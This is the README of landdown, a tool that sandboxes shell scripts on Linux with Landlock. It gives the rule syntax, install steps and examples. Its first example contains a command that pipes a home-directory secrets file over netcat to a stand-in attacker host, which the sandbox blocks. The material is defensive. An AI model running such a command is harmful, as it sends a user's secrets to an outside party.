landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
| Log | Files | Refs | README | LICENSE |
README (2427B)
1 landdown(1) General Commands Manual landdown(1)
2
3
4
5 NAME
6 Landdown - Simple shell script sandbox
7
8
9 DESCRIPTION
10 Landdown is an easy-to-use utility for Linux that allows you to sandbox
11 shell scripts with Landlock. Just like Landlock, Landdown "aims to
12 protect you against the security impacts of bugs or
13 unexpected/malicious behavior". To use, prepend your script with the
14 landdown shebang and a ruleset, and then write your shell script like
15 you would normally. For example:
16
17 #!/usr/bin/env landdown
18 ro /bin
19 ro /lib
20 #!/bin/sh
21 # Following works
22 echo "Hi"
23 # Following fails
24 cat $HOME/my-secrets | nc exploit.com 1337
25
26
27 Landdown locks down file and network access of a script based on rules
28 explicitly listed in the allowlist.
29
30
31
32 SUPPORTED RULES
33 rof <file>
34 rwf <file>
35 ro <dir>
36 rw <dir>
37 bind <port>
38 connect <port>
39
40
41 Each rule can be used zero or more times.
42
43
44 The syntax is
45
46 #!/usr/bin/env landdown
47 <rules...>
48 #!<interpreter>
49 <script content...>
50
51
52 INSTALL
53 go install git.sr.ht/~marcc/landdown@latest
54
55
56 Arch Linux <https://aur.archlinux.org/packages/landdown-git>
57
58
59 EXAMPLES
60 Access a file
61 Write the following script
62
63 #!/usr/bin/env landdown
64 ro /bin
65 ro /lib
66 rwf /tmp/some-file.txt
67 #!/bin/sh
68 echo "Edit" > /tmp/some-file.txt
69
70
71 Try removing rwf /tmp/some-file.txt and the script should fail.
72
73
74 Note: the file need to exist in order for landdown to work, run touch
75 /tmp/some-file.txt to test.
76
77
78 Network access
79 Write the following script
80
81 #!/usr/bin/env landdown
82 ro /bin
83 ro /lib
84 ro /etc/ssl
85 rof /etc/resolv.conf
86 connect 443
87 #!/bin/bash
88 curl https://www.google.com
89
90
91 Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 and it
92 should fail. Network access needs to be explicitly set.
93
94
95 CONTRIBUTIONS
96 Contributions are welcome. Please send them to my public inbox
97 <~marcc/public-inbox@lists.sr.ht>
98
99
100 SEE ALSO
101 sh(1) - section on ulimit
102
103
104 Good Practices <https://docs.kernel.org/userspace-
105 api/landlock.html#good-practices>
106
107
108 Alternatives
109 bubblewrap(1) firejail(1) landrun(1)
110
111 2026-06-30 landdown(1)